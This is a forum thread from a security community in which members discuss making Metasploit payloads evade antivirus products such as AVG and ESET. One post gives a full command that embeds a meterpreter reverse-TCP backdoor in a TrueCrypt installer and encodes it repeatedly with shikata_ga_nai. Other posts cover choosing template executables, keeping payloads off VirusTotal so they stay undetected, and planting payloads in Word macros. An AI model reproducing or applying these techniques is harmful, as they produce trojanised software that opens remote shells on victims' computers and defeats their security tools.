Results 1 to 10 of 10

Thread: Antivirus bypass

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Antivirus bypass

    Hers a video of a demo I made in response to a post on another site stating that AVG picks up all the payloads. It doesnt!!!

    Bypass AntiVirus

    Please comment.

  2. #2
    Junior Member Focaccia's Avatar
    Join Date
    Jun 2009
    Posts
    63

    Default Re: Antivirus bypass

    "how to bypass AVs, but i dont show you how", that's funny

  3. #3
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    It was just to show how it can be done as there is a bit of confusion as to various payloads being picked up by certain AVs if it can be done so its not that hard to find out shikata etc but it matters what exe you use some have packers that prevent the encoding try and see what you come up with didnt want the sig all over virus total etc and as its a public vid didnt want misuse of it.

    thanks for the reply tho.

  4. #4
    Good friend of the forums spawn's Avatar
    Join Date
    Jan 2010
    Posts
    280

    Default Re: Antivirus bypass

    encoding scheme has "ommited",
    I think that you used another exe to generate a payload and encoded with shikata_ga_nai 10 x
    the size of payload is very large, 3,3mb
    I'm wrong ?

    Regards

  5. #5
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: Antivirus bypass

    \o/

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R | msfencode -t exe -x /root/Truecrypt_70.exe -o /root/Truecrypt_70_backdoor.exe -e x86/shikata_ga_nai -c 10
    ¬¬"
    (gdb) disass m(y_br)ain

    ®

  6. #6
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Antivirus bypass

    Hehe
    It was never going to stay secret..

    Its a shame you ommit the commands and didnt clarify (although it was obvious) which file was used for the template.
    But can understand your train of thought on why you did it.

    Must admit that I was a little surprised to see that using shikata_ga_nai encoder only worked with the AV bypass, I had only tested smaller windows executables and had to encode the hell out of them to bypass AV.

    http://www.backtrack-linux.org/forum...r-payload.html

  7. #7
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Hi fellas

    Thanks for taking the time to reply, here's the thing I posted other videos showing what I have learned
    and gave step by step instructions on everything I did and why, for those outside of the forums, the basic home user etc..to make them aware of these attacks and not just go out and buy a top name AV and they have nothing more to worry about. I have had so many tops come to me with Trojans with bundled software from top names and the machines are full of bad stuff.Now I have had lots of views in the forum and no replies so thought i would do this video in the raw so to speak (and look I get replies) also as it was public on various vid sites did not want all and sundry making these payloads. This forum is a place for responsible security issues and findings so I guess I was being responsible for the one part and the guys on here who know their stuff and are trustworthy would get the jist of what was carried out in the exploit. I have learnt a lot on here and "Tape" ur blog has taught me a lot Thanks....Btw I started the Av bypass using your tutorial modified it from there so shout goes out to you my friend....


    I have also made a video on windows 7 and the adobe cooltype as it works and ppl reckon it doesn't.

    Best way to try them out is to get all the major AV trials, install them on vm-machines using snapshots and try to evade form there the main reason I tried lots of different encoding options was :

    1: My main machine has ESET installed and that picks up practically everything others do not so the main
    goal was to evade that.

    2: The exes have different packing methods i think and trial and error ends up with a good exe payload

    AVG picks up bad file sigs on major exes Adobe etc so it tried a not so common app java installer works actually
    and that surprised me so does the True Crypt app most payloads work with others but in this instance AVG picks up
    bad file sig as i said and these apps don't trigger that so they are 100% on all the majors.

    Please note I'm no expert and don't claim to be so all advice most welcome

    Long post I know but hey u deserve an explanation just for replying .

    espreto! you got most of it correct btw.

    Cheers all Pentest09

  8. #8
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Well looks like this demo ended up getting smashed all over virus total ESET picks up all of them now , had this working undetected for nearly 8 months and 2 weeks after this demo it ends up detected.. back to square one....

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Antivirus bypass

    I have a reverse tcp meterpreter session exe made up that is still very much undetected.
    In fact I have a few and all over 4 months old and still functioning.
    They are all based on what I did in my blog... However, if I were to post the exact method I used.. you can bet
    your life it would be checked, tested and checked with VirusTotal and accordingly rendered useless..

    A good lesson learned on your part I would say.

  10. #10
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: Antivirus bypass

    Yeah its ok i just got it passed eset once again, but i find if i use multi-encoding the exe doesn't execute correctly,yeah wont do that one again...still having problems trying to inject payload into macros at the moment in .doc any ideas i get errors it opens the payload and places it in the target drive but thats as far as it gets, doesn't execute the payload, followed step by step met unleashed version but using 2007 not 2003 slightly differs. Thanks for the reply.

    edit: but i find if i use multi-encoding the exe doesn't execute correctly: its ok got it working and thanks to this problem upon resolving and trying to find a new way have in fact tried with 20 AVs in snapshots on vmware, with heuristcs and 100% undetected . So its all cushteee!!!
    Last edited by pentest09; 09-29-2010 at 11:48 AM.

Similar Threads

  1. [ask] antivirus on backtrack
    By tirto in forum OLD Newbie Area
    Replies: 8
    Last Post: 12-10-2009, 09:47 PM
  2. how to setup new antivirus program ?
    By FLOUMBVOM in forum OLD General IT Discussion
    Replies: 14
    Last Post: 10-20-2009, 12:49 PM
  3. Recompiling NetCat [In Windows] To Bypass AntiVirus
    By aspekt9 in forum OLD Newbie Area
    Replies: 27
    Last Post: 06-18-2009, 10:27 AM
  4. Antivirus package suggestion?
    By Dissident85 in forum OLD General IT Discussion
    Replies: 7
    Last Post: 07-18-2008, 11:18 AM
  5. Antivirus
    By asymptote in forum OLD Newbie Area
    Replies: 4
    Last Post: 03-11-2008, 08:06 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •